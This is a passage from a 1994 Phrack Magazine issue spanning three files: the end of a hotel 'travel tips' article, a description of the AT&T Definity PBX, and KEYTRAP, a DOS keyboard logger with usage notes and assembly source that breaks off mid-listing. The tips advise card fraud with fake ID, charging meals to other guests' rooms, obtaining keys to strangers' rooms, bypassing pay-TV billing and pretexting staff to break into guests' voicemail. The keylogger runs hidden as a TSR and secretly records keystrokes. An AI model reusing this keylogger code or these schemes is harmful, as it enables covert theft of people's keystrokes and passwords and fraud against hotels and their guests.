  19134. CREDIT CARDS
  19135. If you have your own card and don't mind paying for the room - great!
  19136. Just use it when you check in - most places require you to have a credit
  19137. card or won't let you use the phone or won't even let you in.
  19138. You want to use someone else's card? Be careful! Don't use a stolen
  19139. card when you check in, or you won't have a safe sleep, fearing that they
  19140. could come and get you. You would be safer if you tell them upon check in
  19141. that you misplaces your card and don't need to make long distance calls,
  19142. and just want to pay with it in the end. This doesn't work always, but
  19143. sometimes. You also need a faked ID upon check in with the same name as
  19144. the cardholder.
  19145.  
  19146. But overall, using a faked Credit Card in a hotel is one of the easiest ways
  19147. to get busted.
  19148.  
  19149. DIALUPS
  19150. Many hotels have dialins for their reservation system. Novells are quite
  19151. popular. Some hotels also use PC based UNIXes (old System V's mostly)
  19152. that are often unprotected - no passwords on the root account or even
  19153. giving you a shell prompt when you call the dialup. Most of them are 7e1
  19154. at slow speeds. I won't say more about reservation systems here.
  19155.  
  19156. EATING & DANCING
  19157. Many hotels have good and relatively expensive restaurants and discos.
  19158. They just require you to sign the check with a room number and full name.
  19159. If you know of a guest that is checked in and has secured his account with
  19160. a credit card who just checked in, just use his name and room number -
  19161. this is probably the biggest lack of security in a hotel.
  19162.  
  19163. Also if you don't stay at the hotel but want to go to their disco at night,
  19164. pretend to be a guest to get in free and save cover charges. They usually
  19165. believe you.
  19166.  
  19167. FUCKING
  19168. You've read right, hotels are favorite places to make love. No matter
  19169. if you bring your IRC date here, pick up a hooker or stay alone and
  19170. watch the in-house porn movies. Since many hotels pride themselves in
  19171. having as much staff as guests, the question is how to get the cute
  19172. waitresses and maids into your bed. If anyone has experience making
  19173. them willing without much financial and physical effort, drop me a
  19174. mail and I will include it in the next list.
  19175.  
  19176. GET ALL
  19177. Some people love to take all movable parts from the room before checking
  19178. out. The question is what to take and what not.
  19179.  
  19180. The easiest things to take are soaps, shampoo, lotions and Kleenex from
  19181. the bathroom, since they will be replaced every morning without problems.
  19182. If you want a bathrobe (usually most expensive item), hide it in your
  19183. suitcase immediately after check in and then complain that there was just
  19184. one robe in your room. They will bring you a new one immediately. If you
  19185. take one when you leave the hotel, they will notice and most likely
  19186. charge you $100 in your credit card. If you want a bath towel, also don't
  19187. wait until the end of your stay, but hide it some days earlier. If anyone
  19188. should ask about it, just tell him that you left it at the pool.
  19189. Taking magazines from your room is usually no problem, but stay away
  19190. from removing the TV or blankets!
  19191.  
  19192. HYATT GOLD PASSPORT
  19193. If you want to check in at a Hyatt, get yourself their Gold Pass before.
  19194. It is free of charge and will get you free Orange Juice, Coffee and a
  19195. newspaper in the morning, and also a bigger room.
  19196.  
  19197. INTERNET
  19198. So you are at a hotel in a new city and want to get on the Internet?
  19199. There are usually 2 ways: Using a computer and a modem from your hotel room
  19200. and calling a dialup, or walking to a local university and logging in from
  19201. there.
  19202.  
  19203. If you bring your laptop with built-in modem, find the dialup in the
  19204. Internet Dialup list in this issue of Phrack, get an account on the host
  19205. and can make free local calls from your room, the first choice is probably
  19206. the best one.
  19207.  
  19208. But if you don't have your own account at a local school and want to
  19209. stay legit, it is often useful to walk to a computer lab in that school
  19210. and check out their computers. Many school around the world have PC's
  19211. in their labs which let you do a telnet throughout the world without
  19212. needing any account or password, or ID to enter the school. You can find
  19213. them in Hong Kong, New York, Munich and many other major cities; but usually
  19214. they are unknown to the public or are likely to be closed down (similar to the
  19215. vending machines, see -> SEVENUP).
  19216.  
  19217. JACKING OFF
  19218. See -> Fucking.
  19219.  
  19220. KEY
  19221. There are plenty of different types of room keys. Some hotels still use
  19222. old-fashioned standard keys, but most use programmable keys (plastic cards
  19223. with "holes" or magnetic stripes, or even the pretty modern metal keys
  19224. in key-shape, which allow programming of their magnetic fields. These
  19225. programmable keys will always be reprogrammed if a guest checks out.
  19226. On the other hand, if you go to the reception and claim that you lost
  19227. your key, they will always program a spare key for you. Sometimes they
  19228. ask you for your birthday, sometimes for your ID (just tell them you
  19229. left it in your room). This way you could easily get into someone else's
  19230. room.
  19231.  
  19232. LIGHT
  19233. Some hotels have quite fancy light systems. If the light won't shine,
  19234. there is often a box in the entrance where you have to enter your key
  19235. (or some paper) to activate the main power. This should help saving
  19236. energy while you are gone, but sometimes even the air condition will
  19237. turn off, so you have to fool the box with a paper or spare key.
  19238. Some systems will turn on certain lights just when you insert the key
  19239. into the door and open it. This is quite unfortunate if your roommate
  19240. sleeps while you go cruising and clubbing at night. When you return,
  19241. the light will shine bright and wake him up. The only thing that helps
  19242. is unscrewing the light bulbs.
  19243.  
  19244. MOVIES & TV
  19245. I bet many of you will first turn on the TV after entering the room.
  19246. Some people just stay at hotels that offer HBO in their rooms.
  19247. Before playing with the remote, read the papers above the TV carefully,
  19248. because some channels might show in-house movies that are being charged
  19249. automatically without any warning. Typical rates are US $6-9 per movie.
  19250. Of course you don't want to pay that much, nor do I.
  19251.  
  19252. Here are the 3 big S' of movie watching:
  19253.      Spectravision, Sex movies and Social Engineering.
  19254.  
  19255. Spectravision is one of the most popular systems. It usually allows you
  19256. to watch 5 minutes (sometimes 2) of each movie per day free, enough for
  19257. some people to come. There are usually a bunch of BNC cables from the
  19258. wall to your Spectravision box and to your TV. One of the cables delivers
  19259. the program, the other assures billing. Use your fantasy and try replacing
  19260. the "billing cable" in the wall! Generally it can also be useful to use
  19261. a standard cable decoder (cablebox) to decode the pay channels. Just bring
  19262. one along and if you are lucky, you can watch the movies easily.
  19263.  
  19264. If all your technical expertise fails, there is still one way of watching
  19265. movies for free: Social Engineering. Just watch the movies of your choice
  19266. and then complain to the reception that you had trouble with the TV,
  19267. that the Spectravision box or remote control broke, or that you caught
  19268. the maid watching movies in your room. If you cry a lot, they will usually
  19269. be nice and remove the movies from your bill.
  19270.  
  19271. PHONE CALLS
  19272. Be careful before making any phone calls from your room. Many hotels
  19273. charge you up to $3 for 800 numbers and log all your touch tones (and
  19274. calling codez!). You can't be sure who will view the logs and abuse your
  19275. calling card. Also there are often high surcharges for long distance calls,
  19276. up to 40% on top of AT&T's operator connected charges. There are also hotels
  19277. that charge a minimum charge per call (up to $5), even if you just talked
  19278. for 10 seconds long distance. On the other side, some hotels offer free local
  19279. and 800 calls. Just make sure and read all papers in the room and contact
  19280. the reception. I also had operators telling me lower rates than the ones that
  19281. showed up on my bill, so be careful.
  19282.  
  19283. RACK RATE
  19284. This is the highest possible rate for a room, and the rate that is officially
  19285. displayed at the reception. You should never pay that rate. If you say you
  19286. are with a company they will give you a discount of at least 10% (corporate
  19287. rate). Some hotels even give qualified people and companies discounts of
  19288. 25% - 50% on the rack rate. When you wonder if you pay too much for your
  19289. room or think you got a great rate, send me a mail, because I try to keep
  19290. a database about cheapest prices for selected hotels.
  19291.  
  19292. SEVENUP, Coke, Pepsi & Rootbeer:
  19293. You are staying at a five-star hotel. You are thirsty. Your room has
  19294. a minibar, but the cheapest soda is $4.95. The next supermarket or gas
  19295. station is 20 miles away. But you need a Coke. What to do now?
  19296.  
  19297. TRY finding the gangways where the employers work, live and eat!
  19298. About every bigger hotel has a kitchen for employees. They also have
  19299. a vending machine hidden somewhere, with sodas for just 60 cents.
  19300.  
  19301. When strolling through the restricted area, just walk straight, slowly
  19302. and self confident. If someone asks you what you are doing, tell them:
  19303. a) you are an undercover agent for the IRS and they should get lost.
  19304. b) you are looking for the vending machine. (telling the truth openly
  19305.    with a broad smile can be more successful than you think!)
  19306. c) you are a new employee and ask her to show you around
  19307.  
  19308. Also notice the signs and posters in most restricted areas, telling
  19309. the personnel to be "enthusiastic, punctual, generous to the guest..."
  19310. Quote these phrases when an employer behaves nasty towards you.
  19311.  
  19312. UPGRADES
  19313. After first going into your room and checking it out, go back to
  19314. the reception and complain that the bed is too small, the street noise
  19315. is too loud, the view is too poor, etc. Quite often they will give you
  19316. a nicer and bigger room on their executive floor! See also -> Hyatt
  19317. Gold Passport.
  19318.  
  19319. VOICE MAIL
  19320. Many good hotels offer voice mail to their guests. The most popular
  19321. system is Meridian Mail. Some hotels have an own dialup for the voicemail,
  19322. but mostly the hotel just lets you access it through the main PBX operator.
  19323. If you are unlucky you have to wait 5 rings at a number before the
  19324. Voice Mail answers.
  19325.  
  19326. Most guests don't use Voice Mail. The few that do also keep the default
  19327. password, which is often the room number or the birthday of the guest.
  19328. One way to get the birthday is call up front desk, tell them you are
  19329. with "Mommy's Birthday Cakes Delivery" and have a cake for John Smith.
  19330. Ask them to check birthday's of all John Smith's etc. Of course there
  19331. are more ways, just use your social engineering fantasy!
  19332.  
  19333. WHERE TO GO?
  19334. It is pretty hard to recommend chains in general. But I had quite
  19335. good experience with Hilton, Hyatt (try getting a room on the Regency
  19336. floor), Holiday Inn (sometimes really cheap prices and good standard),
  19337. Shangri-La (best hotels in Asia) and Marriott (usually nice service).
  19338. I had less good experience with Sheraton (less discounts), Peninsula,
  19339. Regent & Four Seasons (all a bit overpriced and not so modern). But
  19340. there are always exceptions, so tell me about your experience!
  19341.  
  19342.  
  19343. I hope some of these tips might be useful for you. Stay tuned and wait
  19344. for a new issue of travel tips, next time about Airlines!
  19345.  
  19346.  
  19347. (c)opyright 1994 by the author. Publication outside of Phrack forbidden.
  19348.                               ==Phrack Magazine==
  19349.  
  19350.                  Volume Five, Issue Forty-Six, File 25 of 28
  19351.  
  19352. ****************************************************************************
  19353.  
  19354.  
  19355.                        ================================
  19356.                           AT&T Definity System 75/85
  19357.                              Communications System
  19358.                           Description & Configuration
  19359.                        ================================
  19360.                               Written By: erudite
  19361.                               (armitage@dhp.com)
  19362. =====
  19363. Intro
  19364. =====
  19365.  
  19366. Let me introduce you to the AT&T Definity System 75/85.  This communications
  19367. system is a product of the merging of the AT&T System 75 and System 85
  19368. architectures.  The name Definity came from the two words "definitive" and
  19369. "infinity".
  19370.  
  19371. Let me also tell you that there are many different communications systems
  19372. out there. (Merlins, AT&Ts) Many many many, I couldn't name them all, but
  19373. the AT&T systems are nice.  I enjoy working with them, and I hope you enjoy
  19374. this text file.
  19375.  
  19376. This System is an advanced business communications system.  A Digital
  19377. Communications Protocol (DCP) allows data communication through data
  19378. terminal equipment connected to the digital switch.  This allows the
  19379. system to handle data and voice communications simultaneously.
  19380.  
  19381. The System can handle up to 1600 lines that supports all digital, hybrid,
  19382. and analog terminals and equipment.  Up to 400 trunks, and up to 400
  19383. Automatic Call Distribution (ACD) Agents.  The Data switching capacity is up
  19384. to 800 digital data endpoints, and 160 integrated and combined pooled modem
  19385. facilities.
  19386.  
  19387.   ~ 510D Personal Terminal or 515-Type Business Communications Terminal
  19388.   ~ 7404D Terminals
  19389.   ~ 7406D or 7407D Equipped with optional Data Module Base
  19390.   ~ Asynchronous Data Units (ADU) (DCE type device that has rs232c interface)
  19391.   ~ Digital Terminal Data Modules
  19392.   ~ 3270 Data Modules
  19393.   ~ Internal Data Channels
  19394.   ~ Trunk Data Modules (Modular)
  19395.   ~ Processor Data Modules (Modular)
  19396.  
  19397. ==========
  19398. Networking
  19399. ==========
  19400.  
  19401. The Processor Port Network (PPN) always provides the switch processing
  19402. element (SPE) and port circuits.  An Expansion Port Network (EPN) is
  19403. available to increase line size of any system by allowing you to add
  19404. additional port circuits.  The EPN connects to the PPN over a fiber
  19405. optic cable that may be up to 1.86 miles remotely situated.  It may also
  19406. by located adjacent to the PPN.
  19407.  
  19408. This System may be arranged stand-alone or you can integrate it into a
  19409. private network.  You can form these types of Networks:
  19410.         ~ Tandem Tie Trunk Network (TTTN)
  19411.         ~ Electronic Tandem Network (ETN)
  19412.         ~ Main/Satellite Configuration
  19413.         ~ Distributed Communications System (DCS)
  19414.         ~ Centralized Attendant Service (CAS)
  19415.  
  19416. An Integrated Services Digital Network Primary Rate Interface (ISDN-PRI)
  19417. makes it possible for the Definity System to access various private and
  19418. public network services.  With ISDN-PRI the you can access these services:
  19419.         ~ Call by Call Service Selection
  19420.         ~ Private Network Services
  19421.         ~ Information Forwarding
  19422.         ~ Call Identification Display
  19423.           - Connected Number Display
  19424.           - Connected Party Name Display
  19425.           - Calling and Called Number Record Display
  19426.           - Calling and Called Party Name Display
  19427.  
  19428. =============
  19429. Configuration
  19430. =============
  19431.  
  19432. The Actual System is encased in a pair of "cabinets" which have a fiber
  19433. optic link between them.  It is also common to have a stack of about three
  19434. "cabinets" of a smaller size, for different models.
  19435.  
  19436. Shown here is a typical multi-carrier system with a Processor Port Network
  19437. (PPN) cabinet and Expansion Port Network (EPN) cabinet.
  19438.  
  19439.   attendant          outside trunks   _____ outside private line
  19440.    consoles            and lines    /        data transmission equipment or
  19441.       \                      \    /          analog switched network
  19442.         \      fiber optic    |  |
  19443.          |      connection    |  |         __ business communication
  19444.         -+---------/~\--------+--+       /    terminals
  19445.        |   AT&T    | |   AT&T    |      |
  19446.        | DEFINITY  | | DEFINITY  +------'                      ___data
  19447.     ---+  SYSTEM   | |  SYSTEM   +--------<>------[audix]    /    terminals
  19448.   /    |  75/85    | |  75/85    |   modular data          /
  19449.  |     |___________| |__________+|     processor     ____ |
  19450. manager   |   |                 |                   |    +'optional host
  19451. terminal  |   |                 +-------<>----------+    | computer or call
  19452.          /    +-------[]-----+,                     |____| management system
  19453.        /         asynchronous |
  19454.   single line     data unit    \__ data
  19455. voice terminals                    terminals
  19456.  
  19457.  
  19458. ===================
  19459.   Voice and Data
  19460. Management Features
  19461. ===================
  19462.  
  19463. There are a lot of voice features and services, in fact, too many to list, I
  19464. will do a run down on all the interesting and useful features and services.
  19465. It has many Voice Management, Data Management, Network Services, System
  19466. Management, Hospitality Services, and Call Management Services.
  19467.  
  19468.   call attendant can use to operate the console more efficiently
  19469.   both inside system users and remote callers to edit, receive, send,
  19470.   write, and forward voice messages.
  19471.   system.
  19472.   it to the display console.
  19473.   - Attendant Conference: Allows Attendant to construct a conference call
  19474.   - Terminal Conference: Allows remote user to construct a conference call
  19475.     without attendant assistance.
  19476.   being interrupted by any of the systems overriding features, and denies
  19477.   ability to gain access to, and or superimpose tones.
  19478.   is issued by the administrator to a certain extension # for indication of
  19479.   a dedicated private data extension.
  19480.   the system to dial anyone else, such as the attendant console.
  19481.   the following trunks and more.
  19482.         ~ Voice Grade DS1 Tie Trunks
  19483.         ~ Alternative Voice/Data (AVD) DS1 Tie Trunks
  19484.         ~ Digital Multiplexed Interface (DMI) Tie Trunks
  19485.         ~ Central Office (CO) Trunks
  19486.         ~ ISDN-PRI Trunks
  19487.         ~ Remote Access Trunks
  19488.         ~ Wide Area Telecommunications Service (WATS) Trunks
  19489.   features and functions that is used for maintenance testing.  Such as access
  19490.   to system tones, access to specific trunks, etc.
  19491.         Note: AT&T designed the Facility Test Calls Feature for testing
  19492.               purposes only, and system maintenance.  When properly
  19493.               administered, AT&T claims that the customer is responsible for
  19494.               all security items, and secure system from unauthorized users,
  19495.               and that all users should be aware of handling access codes.
  19496.               AT&T claims they will take no responsibility for poor
  19497.               administration.
  19498.   it rings down if busy, or if it receives a dial timeout.
  19499.   packet switched local area network that will link with mainframes,
  19500.   workstations, personal computers, printers, terminals, storage devices,
  19501.   and communication devices.
  19502.   This interface allows connection of the system to an ISDN Network by means
  19503.   of ISDN frame format called PRI.
  19504.   branch has a Listed Directory Number (LDN).
  19505.         ~ Common Control Switching Arrangement (CCSA)
  19506.         ~ Electronic Tandem Network (ETN)
  19507.         ~ Enhanced Private Switched Communications Service (EPSCS)
  19508.         ~ Tandem Tie Trunk Network (TTTN)
  19509.         ~ Software Defined Network (SDN)
  19510.   doesn't want to take responsibility for anything that is abused with this
  19511.   feature.
  19512.   would come in handy.
  19513.   others calls, again, AT&T does not want to take any legal fees on misuse
  19514.   on this feature.
  19515.   attendant's assistance.
  19516.  
  19517. ========
  19518. Software
  19519. ========
  19520.  
  19521. The System comes with switched services software, administrative software,
  19522. and maintenance software.  All running on a real-time operating system.
  19523.  
  19524.   and services.  This also is responsible for relaying any information to the
  19525.   console display.
  19526.   tasks, and configurations.
  19527.   keep everything running properly.
  19528.  
  19529. =====================
  19530. System Administration
  19531. =====================
  19532.  
  19533. The "Access Code" you will encounter on these systems is a 1, 2, or 3 digit
  19534. number. The pound (#) and star (*) keys can be used as the first digit of the
  19535. code.  Below you will see a typical Screen Format taken from one of my logs,
  19536. information aside you can see and get a feel of what the administration side of
  19537. the system is like.                                                                            Page 1 of 4
  19538.  
  19539.                                STATION
  19540.  
  19541. Extension: ____
  19542. Type: _____       Lock Messages: _      COR: _     Room: _____
  19543. Port: ___________ Security Code: ____   COS: _     Jack: _____
  19544. Name: ___________ Coverage Path: ___              Cable: _____
  19545.  
  19546. FEATURE OPTIONS
  19547.  
  19548.     LWC Reception? _____  Headset? _  Coverage Msg Retrieval? _
  19549.    LWC Activation? _  Auto Answer? _        Data Restriction? _
  19550.  Redirect Notification? _        Idle Appearance Preferences? _
  19551. PCOL/TEG Call Alerting? _
  19552.            Data Module? _           Restrict Last Appearance? _
  19553.                Display? _
  19554.  
  19555. ABBREVIATED DIALINGS
  19556.  
  19557.         List1: _____        List2: _____        List3: _____
  19558.  
  19559. BUTTON ASSIGNMENTS
  19560.  
  19561. 1: _______                     6: _______
  19562. 2: _______                     7: _______
  19563. 3: _______                     8: _______
  19564. 4: _______                     9: _______
  19565. 5: _______
  19566.  
  19567.  
  19568. ==================
  19569. System Maintenance
  19570. ==================
  19571.  
  19572. Finally the Maintenance section, where you can see where the errors are
  19573. logged, where all the alarms are sent, printed, etc.
  19574.  
  19575. There are 3 different types of alarms:
  19576.   console or INADS)
  19577.  
  19578. The Error log is reported and can be viewed at The Manager Terminal,
  19579. as well as the alarm log.
  19580.  
  19581. ==============
  19582. Basic Acronyms
  19583. ==============
  19584.  
  19585. ADU     Asynchronous Data Unit
  19586. AUDIX   Audio Information Exchange
  19587. COR     Class of Restriction
  19588. COS     Class of Service
  19589. DCP     Digital Communications Protocol
  19590. DMI     Digital Multiplexed Interface
  19591. EPN     Expansion Port Network
  19592. ISDN    Integrated Service Digital Network
  19593. PPN     Processor Post Network
  19594. PSDN    Packet Switching Data Network
  19595.  
  19596. =====
  19597. Tones
  19598. =====
  19599.  
  19600. Here is most of the Tones, mostly either interesting ones or often used
  19601. tones the System.  Here are the tones, the frequencies, and the moderations.
  19602.  
  19603. Tone                   Frequency          Pattern
  19604. ----                   ---------          -------
  19605. Answer Back 3          2225 Hz            3000 on
  19606. Answer Back 5          2225 Hz            5000 on
  19607. Bridging Warning       440 Hz             1750 on, 12000 off,
  19608.                                           650 on; repeated
  19609. Busy                   480 Hz + 620 Hz    500 on, 500 off; repeated
  19610. Call Waiting
  19611.  Internal              440 Hz             200 on
  19612.  External              440 Hz             200 on, 200 off
  19613.  Attendant             440 Hz             200 on, 200 off
  19614. Priority Call          440 Hz             200 on, 200 off, 200 on,
  19615.                                           200 off, 200 on
  19616. Call Waiting
  19617.  Ring Back             440 Hz + 480 Hz;   900 on (440 + 480)
  19618.                        440 Hz             200 on (440) 2900 off; repeated
  19619. Cnrt Att Call
  19620.  Incoming Call
  19621.  Identification       480 Hz & 440 Hz    100 on (480), 100 on (440),
  19622.                        & 480 Hz           100 on silence;
  19623.  Dial Zero,
  19624.  Attendant Transfer,
  19625.  Test Calls,           440 Hz             100 on, 100 off, 100 on
  19626.  Coverage              440 Hz             600 on
  19627.  Confirmation          350 Hz + 400 Hz    100 on, 100 off, 100 on,
  19628.                                           100 off, 100 on
  19629.  Dial                  250 Hz + 400 Hz    Continuous
  19630.  Executive Override    440 Hz             300 on followed by
  19631.  Intercept             440 Hz & 620 Hz    250 on (440),
  19632.                                           250 on (620); repeated
  19633.  Ringback              440 Hz + 480 Hz    1000 on, 3000 off; repeated
  19634.  Zip                   480                500 on
  19635.  
  19636. =====
  19637. Outro
  19638. =====
  19639.  
  19640.   System 75/85 (multi-carrier cabinet model) communications system.
  19641.  
  19642. I hope you learned something, anywayz, questions comments, system login
  19643. information, defaults, where to get manuals, or anything else:
  19644. email me (armitage@dhp.com) and I will get back to you.
  19645.  
  19646. -----BEGIN PGP PUBLIC KEY BLOCK-----
  19647. Version: 2.3a
  19648.  
  19649. mQCNAi4sHnsAAAEEALjw8E+bOEr1BlCyrBp8f3Ko8yOX5P5uiP+Vor5SamJ33gbu
  19650. PBSBOc+Xww+93Pjl/R7gMC/c/FFtn+ehHsCm5u3AaIXSmx2ZVW2Xen9vXBRMZRB+
  19651. rpC2GdCiFCAdfaHwANHaeuHDmKiP4GqaQuG1M1Xzv9NqW4m70tndGYkB59slAAUT
  19652. tAdFcnVkaXRl
  19653. =Nx+g
  19654. -----END PGP PUBLIC KEY BLOCK-----
  19655.  
  19656. erudite (armitage@dhp.com) (armitage on irc)                              ==Phrack Magazine==
  19657.  
  19658.                  Volume Five, Issue Forty-Six, File 26 of 28
  19659.  
  19660. ****************************************************************************
  19661.  
  19662.                    KEYTRAP v1.0 - Keyboard Key Logger
  19663.                       by Dcypher (Dcypher@aol.com)
  19664.  
  19665.  
  19666. -------------------------------------------------------------------------
  19667. THIS PROGRAM MAY NOT BE DISTRIBUTED IN ANY WAY THAT VIOLATES U.S. OR
  19668. FOREIGN LAW.  THIS PROGRAM MUST NOT BE USED TO GAIN UNAUTHORIZED ACCESS
  19669. TO DATA AND IS NOT INTENDED TO HELP USERS TO VIOLATE THE LAW !
  19670. -------------------------------------------------------------------------
  19671. You may distributed UNMODIFIED copies of KEYTRAP freely, subject to the
  19672. above limitations, and provided all files are included in unmodified
  19673. form; KEYTRAP.EXE, KEYTRAP.DOC
  19674. -------------------------------------------------------------------------
  19675. The author disclaims ALL warranties relating to the program, whether
  19676. express or implied.  In absolutely no event shall the author be liable
  19677. for any damage resulting from the use and/or misuse of this program.
  19678. -------------------------------------------------------------------------
  19679.  
  19680.  
  19681.  
  19682.  
  19683. WHAT IS KEYTRAP ?
  19684. ~~~~~~~~~~~~~~~~~
  19685. KEYTRAP is a very effective keyboard key logger that will log
  19686. keyboard scancodes to a logfile for later conversion to ASCII
  19687. characters. Keytrap installs as a TSR, remaining in memory
  19688. until the computer is turned off.
  19689.  
  19690. CONVERT will convert the keyboard scancodes captured by Keytrap
  19691. to their respective keyboard (ASCII) characters.
  19692.  
  19693.  
  19694. Usage: KEYTRAP <dir\logfile> /A /B /C
  19695. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19696. A - Maximum size of logfile
  19697. B - Number of keys to log per session
  19698. C - Number of minutes between each session
  19699.  
  19700. Keytrap is a command line program.
  19701.  
  19702. <dir\logfile> - You MUST specify a directory for the logfile.
  19703. If you don't specify a directory Keytrap will only look in the
  19704. current directory for the logfile. If the logfile is not found
  19705. in the current directory no writing will occur. Keytrap will
  19706. append the scancode data to the end of the file you specify.
  19707.  
  19708. A - The Maximum size of the logfile. This number is checked only
  19709. when Keytrap is installed. If the size of the logfile exceeds this
  19710. number, Keytrap will delete the logfile and create a new one.
  19711.  
  19712. B - This is the number of keys to log per session. Keytrap will
  19713. only check this number AFTER a write to the logfile. So if you
  19714. specify 50 keys, and Keytrap does not get a chance to write till
  19715. there are 100 keys in the buffer, then Keytrap will log 100 keys.
  19716.  
  19717. C - This is the number of minutes between each session. When Keytrap
  19718. reaches or exceeds the number of keys to log per session, it will
  19719. start a delay routine and check this number. You can't specify more
  19720. then 1440 minutes, the number of minutes in a day !
  19721.  
  19722. Example: KEYTRAP c:\logfile /20000 /200 /20
  19723.  
  19724. Keytrap will check "logfile" to see if it exceeds 20,000
  19725. bytes. If it does, Keytrap will delete the log file and then
  19726. create a new one. Keytrap will then install as a TSR program.
  19727. It will log approx 200 keys at a time with a delay of 20 minutes
  19728. between each session.
  19729.  
  19730.  
  19731. Usage: CONVERT logfile outfile
  19732. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  19733. logfile: The file that contains the scancodes that Keytrap logged.
  19734. outfile: Specify an output file name.
  19735.  
  19736. Theres not too much to say here. This program just converts scancodes
  19737. from the logfile into their respective keyboard (ASCII) characters.
  19738.  
  19739.  
  19740. NOTES
  19741. ~~~~~
  19742. Keytrap will not display ANY messages. Check the logfile and
  19743. the size of the logfile if your not sure Keytrap is working.
  19744.  
  19745. Keytrap will only make the logfile hidden if the logfile is
  19746. actually created by Keytrap or the maximum size of the logfile
  19747. is reached or exceeded. If you specify a file that already
  19748. exists then Keytrap will not change that files attributes and
  19749. will append all scancode data to the end of the file.
  19750.  
  19751. Keytrap will not crash if the logfile gets deleted while Keytrap
  19752. is in memory. It will just keep looking for the logfile so it can
  19753. write its buffer. A buffer write is not forced until the buffer
  19754. reaches 400 bytes. It will then try to write its buffer during
  19755. the next interrupt 21 call.
  19756.  
  19757. -------------------------------------------------------------------------
  19758.  
  19759. If you have any questions or need some help, e-mail me.
  19760. Below is my public pgp key, don't e-mail me without it !
  19761.  
  19762.                              Dcypher (Dcypher@aol.com)
  19763.  
  19764. -----BEGIN PGP PUBLIC KEY BLOCK-----
  19765. Version: 2.6
  19766.  
  19767. mQCNAi3iD5cAAAEEAMVJGdgCYzG5av0lLSjO7iXm64qsuk6v/dx5XcMoNmOHNUA3
  19768. +tzF0WuVPXuJ59mFxE3/rhQqyh8Mci0f4qT6TR7FfSb8vtzSkF5vW8cNUmQx8Qvf
  19769. B/YQZVmztNlWOPROAmT8ZHbsrNev2rgeYjouW3ZOUgA4RKBRYiCTuXD+VOlxAAUR
  19770. tBlEY3lwaGVyIDxEY3lwaGVyQGFvbC5jb20+
  19771. =w2RN
  19772. -----END PGP PUBLIC KEY BLOCK-----
  19773.  
  19774. *****************************************************************************
  19775.  
  19776. ;
  19777. ;
  19778. ; KEYTRAP v1.0 - Keyboard Key Logger
  19779. ; By Dcypher (Dcypher@aol.com)
  19780. ;
  19781. ; Usage: KEYTRAP <dir\logfile> /A /B /C
  19782. ;
  19783. ;        A - Maximum size of log file.
  19784. ;        B - Number of keys to log per session.
  19785. ;        C - Minutes between each session.
  19786. ;
  19787. ;------------------------------------------------
  19788.       ;
  19789.  .286                                    ; 286 or better
  19790.  .model small                            ;
  19791.  .code                                   ;
  19792.  org     100h                            ;
  19793.       ;
  19794. begin:  jmp     install    ;
  19795.       ;
  19796. ;================================================
  19797.       ;
  19798. db      ' DCYPHER@AOL.COM / KEYTRAP V1.0 ' ; PLEASE DON'T REMOVE
  19799.       ;
  19800. buf             db 401 dup (0)                  ; 400 byte buffer
  19801. bufptr          dw 0                            ;  +1 for luck :)
  19802.       ;
  19803. hide            db 0    ; save int21 function call
  19804. stimem          dw 0    ; grab time when done
  19805. handle          dw 0                            ; logfile handle
  19806. control         db 0    ; control which INT to use
  19807. done_flag       db 0    ; session done flag
  19808. must_write      db 0                            ; must-write flag
  19809. write_amount    dw 0                            ; amount written to disk
  19810. using_21        db 0    ; already doing an int-21
  19811.       ;
  19812. old_9a_off      dw 0    ;
  19813. old_9a_seg      dw 0                            ;
  19814.       ;
  19815. old_9b_off      dw 0    ;
  19816. old_9b_seg      dw 0                            ;
  19817.       ;
  19818. old_21_off      dw 0                            ;
  19819. old_21_seg      dw 0                            ;
  19820.       ;
  19821. datasegm        dw 0                            ; save data-segment
  19822.       ;
  19823. delaym          dw 0    ; delay, in minutes
  19824. mkeys           dw 0                            ; maximum number of keys
  19825. logH            dw 0                            ; log file size
  19826. logL            dw 0                            ; log file size
  19827.       ;
  19828. ;==============================================================================
  19829.       ;
  19830. int_9A: pushf                                   ;
  19831.  pusha                                   ;
  19832.  push    es     ;
  19833.         push    ds                              ;
  19834.  mov     ds, datasegm                    ; we are here
  19835.       ;
  19836.  cmp     control, 1   ; use this one ?
  19837.         je      A91    ;
  19838.         call    pkey    ; process key (scancode)
  19839.         ;
  19840.    A91: pop     ds                              ;
  19841.  pop     es                              ;
  19842.  popa                                    ;
  19843.  popf                                    ;
  19844.  jmp     dword ptr old_9a_off            ;
  19845.       ;
  19846. ;================================================
  19847.       ;
  19848.   pkey: cmp     done_flag, 1                    ; completely done ?
  19849.  je      pk2                             ;
  19850.  cmp     bufptr, 400                     ; buffer limit reached ?
  19851.  jae     pk2                             ;
  19852.       ;
  19853.  in      al, 60h                         ; get scancode
  19854.       ;
  19855.  cmp     al, 39h                         ; get downstroke and only
  19856.  ja      pk2                             ; as far as spacebar
  19857.         cmp     al, 2Ah    ;
  19858.         je      pk2    ; no shift
  19859.         cmp     al, 36h    ;
  19860.         je      pk2    ; no shift
  19861.       ;
  19862.         push    0    ;
  19863.         pop     es    ;
  19864.         mov     ah, byte ptr es:[417h]  ; shift status
  19865.         test    ah, 43h    ; test for both shift keys
  19866.         je      pk1           ; and cap-lock active
  19867.       ;
  19868.         add     al, 80h    ; show shift or cap-lock
  19869.    pk1: mov     di, bufptr                      ; in logfile
  19870.  mov     buf[di], al                     ; place scancode in buffer
  19871.  inc     di                              ;
  19872.  mov     bufptr, di                      ;
  19873.         mov     must_write, 1      ; try to write buffer
  19874.       ;
  19875.    pk2: ret     ;
  19876.       ;
  19877. ;================================================
  19878.       ;
  19879. int_9B: pushf                                   ;
  19880.  pusha                                   ;
  19881.  push    es                              ;
  19882.  push    ds                              ;
  19883.  mov     ds, datasegm                    ; we are here
  19884.       ;
  19885.         cmp     control, 0   ; use this one ?
  19886.         je      B91       ; (not really needed)
  19887.         call    pkey    ; process a key (scancode)
  19888.       ;
  19889.    B91: pop     ds                              ;
  19890.  pop     es    ;
  19891.  popa                                    ;
  19892.  popf                                    ;
  19893.  jmp     dword ptr old_9b_off            ;
  19894.       ;
  19895. ;==============================================================================
  19896.       ;
  19897. int_21: pushf                                   ;
  19898.  pusha                                   ;
  19899.  push    es                              ;
  19900.  push    ds                              ;
  19901.  mov     ds, datasegm                    ; here we are
  19902.       ;
  19903.         cmp     ax, 0ffffh   ; check if already installed
  19904.         je      D21    ;
  19905.       ;
  19906.  cmp     using_21, 1                     ; might need to call an
  19907.  je      C21                             ; int-21 here so jump if
  19908.  mov     using_21, 1                     ; called from below
